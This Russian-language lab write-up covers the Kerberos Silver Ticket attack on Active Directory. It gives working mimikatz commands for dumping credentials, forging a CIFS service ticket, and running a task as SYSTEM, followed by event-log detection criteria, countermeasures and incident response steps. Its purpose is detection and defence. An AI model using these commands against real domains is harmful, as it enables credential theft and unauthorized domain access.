Подобно атаки Golden Ticket , атака Silver Ticket включает в себя компрометацию учетных данных и злоупотребление структурой протокола Kerberos . Однако, в отличие от Золотого билета, который предоставляет злоумышленнику неограниченный доступ к домену, Серебряный билет позволяет злоумышленнику только подделывать билеты службы выдачи билетов (TGS) для определенных служб. Билеты TGS шифруются хэшем пароля для сервиса. Поэтому, если злоумышленник украдет хэш для служебной учетной записи, он может создать билеты TGS для этой службы.
| Объект атаки | Active Directory |
| Приложения | mimikatz |
| Тактика ATT&CK | Credential Access |
| Техника ATT&CK | T1558.002 |
| Виртуальные машины | Windows 10 (192.168.56.111) Windows Server 2019 (192.168.56.113) |
| Учетные записи | usertest — пользователь без административных привилегий adadmin — администратор домена |
| Настройки журналирования | Расширенные настройки аудита windows Sysmon Wireshark |
Данная статья носит исключительно ознакомительный характер и не является руководством к действию.
Этапы атаки
Раскрытие хэша учетной записи компьютера
#Windows mimikatz - выгрузка NTLM учетной записи рабочей станции WIN-KJOFE29AB0E (контролер домена) под пользователем adadmin
mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” exit

Получение SID домена
#Windows
whoami /user

Формирование поддельного билета
#Windows mimikatz - создает серебряный билет для службы CIFS
kerberos::golden /domain:home.local /sid:S-1-5-21-2509495909-1219801760-1757532611 /id:1107 /ptt /target:win-kjofe29AB0e.home.local /service:CIFS /rc4:d9e5fd1440d5c7a03bf30240e4b9b336 /user:newservice

#PowerShell - проверяем командой klist, что билет для службы CIFS создан
klist

#Windows mimikatz - запускаем команду misc::cmd, чтобы запустить cmd в контексте созданного билета и выполняем успешное подключение к контролеру домена
misc::cmd

Доступные службы Silver Tickets
| Вариант использования | службы Silver Tickets |
|---|---|
| WMI | HOST RPCSS |
| удаленный запуск PowerShell | HOST HTTP |
| WinRM | HOST HTTP |
| Scheduled Tasks | HOST |
| Windows File Share, также psexec | CIFS |
| операции LDAP, включая DCSync | LDAP |
| Средства удаленного администрирования Windows | RPCSS LDAP CIFS |
Обнаружение
| Коммуникация | Источник | Команда | Место | Информация |
|---|---|---|---|---|
| Windows 10 (192.168.56.111) -> Windows Server 2019 (192.168.56.113) | Destination host Windows Server 2019 (192.168.56.113) | Служба CIFS: dir \win-kjofe29AB0e\c$ | Event log — Security | Event ID: 4624 Security ID: HOME\Administrator Account Name: newservice Account Domain: home.local |
| Event ID: 4672 Security ID: HOME\Administrator Account Name: newservice | ||||
| Служба HOST: schtasks /create /S home.local /SC weekly /RU «NT Authority\System» /TN «SomeTaskName» /TR «C:\test\mimikatz-masetr\mimikatz-master\x64\mimikatz.exe» | Event log — Security | Event ID: 4624 Security ID: HOME\usertest Account Name: newservice Account Domain: home.local | ||
| Event ID: 4672 Security ID: HOME\usertest Account Name: newservice | ||||
| Event ID: 4702 Security ID: HOME\usertest Account Name: newservice |
Критерии для правил корреляции
Атака Silver Ticket сложна в обнаружении автоматизированными средствами, необходимо выполнить аналитику нескольких косвенных признаков, которые могут быть легитимными.
Наилучший способ обнаружения серебряных билетов — это отслеживать события безопасности Windows на рабочих станциях, серверах и контроллерах домена на предмет событий входа/выхода из системы с аномалиями в поле домена и пользователя, например:
- Имена пользователей, которых не существует
- Несоответствие имени пользователя и идентификатора

Событие Event ID 4624:
Не совпадает Security ID и Account Name. Поле Account Domain написано в нижнем регистре.


Событие Event ID 4672:
Не совпадает Security ID и Account Name.


Событие Event ID 4702:
Не совпадает Security ID и Account Name.

Проверка срока жизни выпущенного билета:
Срок жизни билета превышает максимальное значение для домена (по умолчанию срок действия составляет 10 часов, но, например, mimikatz выпускает на 10 лет).
Сетевой трафик:
Отсутствуют TGT и TGS запросы, так как злоумышленник формирует билет самостоятельно на собственной локальной машине, поэтому сразу отправляет сформированный TGS.
Противодействие
- Пароли для учетных записей служб, локальных администраторов и администраторов домена должны генерироваться случайным образом, содержать не менее 30 символов и регулярно меняться
- Проверка имен пользователей, которые отсутствуют в Active Directory
Реагирование
- Активируйте процесс реагирования на инциденты и предупредите группу реагирования на инциденты
- Поместите в карантин любые затронутые компьютеры (например, хост, отправивший билет на обслуживание) для проведения анализа, устранения и восстановления
- Заменить пароль для администраторов домена и скомпрометированной учетной записи службы
Источники:
https://adsecurity.org/?p=2011
Файлы логов:
- CIFS.evtx— события Windows Server 2019 (192.168.56.113)
- CIFS.pcap — сетевой трафик Windows Server 2019 (192.168.56.113)
- HOST.evtx— события Windows Server 2019 (192.168.56.113)
- HOST.pcap — сетевой трафик Windows Server 2019 (192.168.56.113)
События:
- 16.05.2023 в 14:56:48 CIFS.evtx — вход в систему под несуществующим пользователем и SID
- 16.05.2023 в 15:27:55 HOST.evtx — вход в систему под несуществующим пользователем и SID



